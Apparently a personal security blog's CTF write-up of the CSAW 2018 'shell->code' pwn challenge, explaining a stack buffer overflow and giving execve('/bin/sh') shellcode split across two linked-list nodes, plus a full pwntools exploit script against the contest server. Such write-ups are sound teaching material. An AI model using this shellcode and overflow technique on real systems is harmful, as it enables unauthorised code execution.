<!DOCTYPE html><html lang="en" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>shell->code -- CSAW2018 Quals | Pedro Bernardo</title><meta name="generator" content="Jekyll v4.0.0" /><meta property="og:title" content="shell-&gt;code – CSAW2018 Quals" /><meta name="author" content="Pedro Bernardo" /><meta property="og:locale" content="en_US" /><meta name="description" content="Points: 100" /><meta property="og:description" content="Points: 100" /><link rel="canonical" href="http://localhost:4000/posts/CSAW18_shell-code/" /><meta property="og:url" content="http://localhost:4000/posts/CSAW18_shell-code/" /><meta property="og:site_name" content="Pedro Bernardo" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2018-09-20T00:00:00+08:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="shell-&gt;code – CSAW2018 Quals" /><meta name="twitter:site" content="@bl4ck_pwn" /><meta name="twitter:creator" content="@Pedro Bernardo" /> <script type="application/ld+json"> {"@type":"BlogPosting","url":"http://localhost:4000/posts/CSAW18_shell-code/","dateModified":"2018-09-20T00:00:00+08:00","datePublished":"2018-09-20T00:00:00+08:00","headline":"shell-&gt;code – CSAW2018 Quals","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/CSAW18_shell-code/"},"author":{"@type":"Person","name":"Pedro Bernardo"},"description":"Points: 100","@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" as="style" href="/assets/css/main.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="stylesheet" href="/assets/css/main.css"><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/popper.js@1.15.0/dist/umd/popper.min.js" integrity="sha256-fTuUgtT7O2rqoImwjrhDgbXTKUwyxxujIMRIK7TbuNU=" crossorigin> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script> window.jQuery || document.write('<script src="/assets/lib/jquery-3.4.1.min.js"><\/script>'); </script> <script src="https://cdn.jsdelivr.net/npm/popper.js@1.15.0/dist/umd/popper.min.js" integrity="sha256-fTuUgtT7O2rqoImwjrhDgbXTKUwyxxujIMRIK7TbuNU=" crossorigin="anonymous" async></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" integrity="sha256-5+02zu5UULQkO7w1GIr6vftCgMfFdZcAHeDtFnKZsBs=" crossorigin="anonymous" async></script> <script src="/assets/js/dist/commons.js" async></script> <script src="/assets/js/dist/timeago.min.js" async></script><link rel="preload" as="style" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/syntax.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/syntax.css"><link rel="preload" as="style" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css"><link rel="preload" as="script" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js"><link rel="stylesheet" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css" /> <script src="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js" async></script> <script src="/assets/js/dist/toc.min.js" async></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/sample/avatar.png" alt="avatar"> </a></div><div class="profile-text mt-3"><div id="site-title"> <a href="/">Pedro Bernardo</a></div><div id="site-subtitle" class="font-italic">Computer Science MsC student. CyberSec enthusiast and CTF player.</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-3 mr-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-3 mr-3 unloaded"></i> <span>WORK</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-3 mr-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-3 mr-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-3 mr-3 unloaded"></i> <span>ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex justify-content-around mt-4"> <span id="mode-toggle-wrapper" class="d-flex justify-content-center align-items-center"> <!-- Switch the mode between dark and light. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <i class="mode-toggle fas fa-sun" light-mode-invisible></i> <i class="mode-toggle fas fa-moon" dark-mode-invisible></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.mode != null) { if (this.mode == ModeToggle.DARK_MODE) { if (!this.isDarkPrefer) { this.setDark(); } } else { if (this.isDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.mode != null) { if (self.mode == ModeToggle.DARK_MODE) { if (!self.isDarkPrefer) { self.setDark(); } } else { if (self.isDarkPrefer) { self.setLight(); } } self.clearMode(); } }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isDarkPrefer() { return this.sysDarkPrefers.matches; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } flipMode() { if ((this.mode == null && this.isDarkPrefer) || this.mode == ModeToggle.DARK_MODE) { this.setLight(); } else { /* light mode or default-light */ this.setDark(); } } } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span> <a href="https://github.com/pedro-bernardo" target="_blank"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/bl4ck_pwn" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href="javascript:window.open('mailto:' + ['pedro.m.s.bernardo','tecnico.ulisboa.pt'].join('@'))"> <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" target="_blank"> <i class="fas fa-rss"></i> </a></div></div><div id="main-wrapper"> <!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>shell->code -- CSAW2018 Quals</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <a href="javascript:;">Cancel</a></div></div><div id="main"> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"> <!-- Define the liquid date formats. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>shell->code -- CSAW2018 Quals</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="timeago" data-toggle="tooltip" title="Thu, Sep 20, 2018, 12:00 AM +0800"> Sep 20, 2018 <i class="unloaded">2018-09-20T00:00:00+08:00</i> </span> on <a href='/categories/ctf-writeups/'>CTF Writeups</a></div></div><div class="post-content"><p><strong>Points:</strong> 100</p><p><strong>Solves:</strong> 261</p><p><strong>Description:</strong></p><blockquote><p>Linked lists are great! They let you chain pieces of data together.</p><p><code class="highlighter-rouge">nc pwn.chal.csaw.io 9005</code></p><p>flag format: <code class="highlighter-rouge">flag{...}</code></p></blockquote><p><strong>Given:</strong></p><p><a href="shellpointcode">shellpointcode</a></p><h1 id="introduction">Introduction</h1><p>shell-&gt;code was a 100 points pwn challenge on the CSAW’18 CTF Qualification Round</p><h1 id="reversing-the-problem">Reversing (The Problem)</h1><p>The clue was: “Linked lists are great! They let you chain pieces of data together”</p><p>Running checksec on the binary gives the following result:</p><p><img class="lozad" src=/assets/img/commons/loading.png data-src="/assets/img/CSAW18_shell-%5C%3Ecode/checksec.png" alt="upload-image" /></p><p>This gives us a few clues already:</p><ol><li>NX is disabled and there are RWX segments, which points to possible shellcode injection.</li><li>Full RELRO means that we can’t overwrite the GOT.</li><li>No stack canary, which points to a possible buffer overflow vulnerability.</li></ol><p>Running the program, it asks twice for 15 bytes of data, to store on two separate linked list nodes, node 1 and node 2. Then it leaks the second node’s address through the “next” pointer in the first node. Finally, it asks for our initials and then prints a goodbye message using our input.</p><p>Let’s check it out in IDA Free:</p><p><img class="lozad" src=/assets/img/commons/loading.png data-src="/assets/img/CSAW18_shell-%5C%3Ecode/nononode.png" alt="upload-image" /></p><p>Here we can confirm that we are only allowed to store the 15 bytes the program asks for, so no overflows in this part. However, we can see a call to the goodbye function which, I assume, is where the programs asks for our initials and says goodbye.</p><p><img class="lozad" src=/assets/img/commons/loading.png data-src="/assets/img/CSAW18_shell-%5C%3Ecode/goodbye_overflow.png" alt="upload-image" /></p><p>And indeed, we see the stack frame growing 16 bytes, and fgets reading 0x20 bytes into [rbp - 3], which means we have 29 bytes of overflow.</p><p>Testing it out wields the following result:</p><p><img class="lozad" src=/assets/img/commons/loading.png data-src="/assets/img/CSAW18_shell-%5C%3Ecode/segfault.png" alt="upload-image" /></p><p>Aha! Just as we expected. So, there’s our buffer overflow. With this, we should have enough space to overwrite the saved return address. Let’s find out the offset between our input and the saved return address in gdb.</p><p><img class="lozad" src=/assets/img/commons/loading.png data-src="/assets/img/CSAW18_shell-%5C%3Ecode/offset.png" alt="upload-image" /></p><p>The highlighted value is what we want to overwrite and it’s 11 bytes away from where our input is stored.</p><p>Now the only thing left to know is where the nodes are, relative to each other, so we can have the big picture of what’s going on. Again using gdb, we can see that node 2 (lower address) is higher than node 1 (higher address) on the stack, 32 bytes appart.</p><p><img class="lozad" src=/assets/img/commons/loading.png data-src="/assets/img/CSAW18_shell-%5C%3Ecode/node_off.png" alt="upload-image" /></p><p>(node 1 is filled with A’s (0x41) and node 2 is filled with B’s (0x42))</p><h1 id="the-solution">The Solution</h1><p>Recap: We have a leak from an address where we can store 15 bytes of data and we know the offset from this address to the other address where we can store another 15 bytes. From checksec, we know the binary doesn’t have NX enabled, so we can execute code on the stack.</p><p>I solved this challenge by injecting shellcode in both nodes, and jumping between them with a short jump to save space. The script was developed in python using the pwntools library.</p><p>We have to keep in mind that fgets stops when it sees a \x00, so our shellcode can’t have any of those.</p>><code class="language-assembly"> ; complement of "/bin/sh\x00" mov rbx, 0xff978cd091969dd0 not rbx jmp short $+20 xor rsi, rsi push 59 pop rax push rbx mov rdi, rsp syscall </code><p>First, the complement of “/bin/sh\x00” is moved into the rbx register, and then, before we push rbx we run a not on it. This way, we can push “/bin/sh\x00” without any 0’s in our code. Then I found the exact offset on gdb to where we wanted our code to jump to and hardcoded it. The rest is straightforward x86-64, avoiding instructions with 0’s in them. This code is 27 bytes long and calls sys_execve(“/bin/sh\x00”, null, null). It’s split into 15 bytes in node 2 and 12 bytes in node 1.</p><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
</pre><td class="rouge-code"><pre><span class="c1">#!/usr/bin/env python2.7
</span><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">binary_path</span> <span class="o">=</span> <span class="s">"./shellpointcode"</span>

<span class="n">SERVER</span> <span class="o">=</span> <span class="s">"pwn.chal.csaw.io"</span>
<span class="n">PORT</span> <span class="o">=</span> <span class="mi">9005</span>
<span class="c1"># Change to False to interact with the server
</span><span class="n">local</span> <span class="o">=</span> <span class="bp">False</span>
<span class="k">if</span> <span class="n">local</span><span class="p">:</span>
   <span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="n">binary_path</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">9999</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
   <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="n">SERVER</span><span class="p">,</span> <span class="n">PORT</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">9999</span><span class="p">)</span>

<span class="s">"""
    xor rsi, rsi
    push 59
    pop rax
    push rbx
    mov rdi, rsp

    syscall
"""</span>
<span class="n">node_1</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x48\x31\xf6\x6a\x3b\x58\x53\x48\x89\xe7\x0f\x05</span><span class="s">"</span>

<span class="s">"""
    mov rbx, 0xff978cd091969dd0
    not rbx
    jmp short $+20
"""</span>
<span class="n">node_2</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x48\xbb\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xd3\xeb\x12</span><span class="s">"</span>

<span class="n">padding</span> <span class="o">=</span> <span class="s">'A'</span><span class="o">*</span><span class="mi">11</span>

<span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">node_1</span><span class="p">)</span>
<span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">node_2</span><span class="p">)</span>
<span class="n">p</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"node.next:"</span><span class="p">)</span>

<span class="c1"># parse the leaked address
</span><span class="n">node_2_addr</span> <span class="o">=</span> <span class="n">p</span><span class="o">.</span><span class="n">recvline</span><span class="p">()</span>
<span class="s">"""
we add 8 to the leaked address, because our input is at
offset 8 from the start of node 2 which is the leaked address,
being the first 8 bytes reserved to the pointer to the next node on the list.
"""</span>
<span class="n">rip</span> <span class="o">=</span> <span class="n">p64</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">node_2_addr</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span> <span class="o">+</span> <span class="mi">8</span><span class="p">)</span>
<span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">padding</span> <span class="o">+</span> <span class="n">rip</span><span class="p">)</span>
<span class="n">p</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span>
</pre></table></code></div></div><p>Now we run the script and get the flag!</p><p><img class="lozad" src=/assets/img/commons/loading.png data-src="/assets/img/CSAW18_shell-%5C%3Ecode/win.png" alt="upload-image" /></p></div><div class="post-tail text-muted"><div class="mb-4"> <a href="/tags/csaw18/" class="post-tag no-text-decoration" >csaw18</a> <a href="/tags/pwn/" class="post-tag no-text-decoration" >pwn</a></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 topbar-down"><div class="access"><div id="access-lastmod" class="post mb-4"><h3 data-toc-skip>Recent Update</h3><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/nullcon20_dark_honya/">Dark Honya -- nullcon HackIM 2020</a></li></ul></div><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <!-- The trending tags list v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung MIT Licensed --> <a class="post-tag" href="/tags/pwn/">pwn</a> <a class="post-tag" href="/tags/pwn2win/">pwn2win</a> <a class="post-tag" href="/tags/plaid2019/">plaid2019</a> <a class="post-tag" href="/tags/nullcon20/">nullcon20</a> <a class="post-tag" href="/tags/interfaces/">interfaces</a> <a class="post-tag" href="/tags/heap/">heap</a> <a class="post-tag" href="/tags/graphics/">graphics</a> <a class="post-tag" href="/tags/databases/">databases</a> <a class="post-tag" href="/tags/csaw18/">csaw18</a> <a class="post-tag" href="/tags/computer-networks/">computer networks</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="post-extend-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- The related posts of current post. Placed in the bottom of every single post. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-4 mb-2 mb-sm-4 pb-2"><h3 class="pt-2 mt-1 mb-4" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/Heap_Exploitation_Lecture/"><div class="card-body"> <span class="timeago small"> Dec 3, 2019 <i class="unloaded">2019-12-03T00:00:00+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Heap Exploitation Lecutre</h3><div class="text-muted small"><p>Lecture with Jorge on Glibc’s Heap basics and how to exploit it. We covered the following topics: Chunks and chunk implementation Coalescing Main arena and Bins Tcache Common attacks ...</p></div></div></a></div><div class="card"> <a href="/posts/PlaidCTF19_splaid_birch/"><div class="card-body"> <span class="timeago small"> Apr 19, 2019 <i class="unloaded">2019-04-19T00:00:00+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>SPlaid Birch -- Plaid CTF 2019</h3><div class="text-muted small"><p>With jofra Points: 300 Solves: 41 Description: I make sure never to use scanf(“%s”) when doing competitive programming so that my solutions don’t have buffer overflows. But writing algori...</p></div></div></a></div><div class="card"> <a href="/posts/Pwn2Win19_random_vault/"><div class="card-body"> <span class="timeago small"> Nov 10, 2019 <i class="unloaded">2019-11-10T00:00:00+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Random Vault -- Pwn2Win 2019 CTF</h3><div class="text-muted small"><p>With Jorge Points: 303 (dynamic) Solves: 18 TL;DR Only two Format String vulnerability allowed. Use first Format String to bypass PIE mitigation Use second Format String to: cha...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/Human_computer_interaction/" class="btn btn-outline-primary"><p>Human Computer Interaction</p></a> <a href="/posts/Computer_graphics/" class="btn btn-outline-primary"><p>Computer Graphics</p></a></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const observer = lozad(); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="copyright"><p class="mb-0"> © 2019-2020<a href="https://twitter.com/bl4ck_pwn" class="ml-1">Pedro Bernardo</a>. <br>Powered by <a href="https://jekyllrb.com" target="_blank">Jekyll</a> with theme <a href="https://github.com/cotes2020/jekyll-theme-chirpy/">Chirpy</a>.</p></div><div class="license"><p class="mb-0"> The blog posts on this site are licensed under the <a href="https://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License</a>.</p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted">Trending Tags</h4><!-- The trending tags list v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung MIT Licensed --> <a class="post-tag" href="/tags/pwn/">pwn</a> <a class="post-tag" href="/tags/pwn2win/">pwn2win</a> <a class="post-tag" href="/tags/plaid2019/">plaid2019</a> <a class="post-tag" href="/tags/nullcon20/">nullcon20</a> <a class="post-tag" href="/tags/interfaces/">interfaces</a> <a class="post-tag" href="/tags/heap/">heap</a> <a class="post-tag" href="/tags/graphics/">graphics</a> <a class="post-tag" href="/tags/databases/">databases</a> <a class="post-tag" href="/tags/csaw18/">csaw18</a> <a class="post-tag" href="/tags/computer-networks/">computer networks</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js" integrity="sha256-qcLR00zq6pJk4je3MLgAri8Nn+ZumUlXgTKR2H/xCY0=" crossorigin="anonymous"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="http://localhost:4000{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
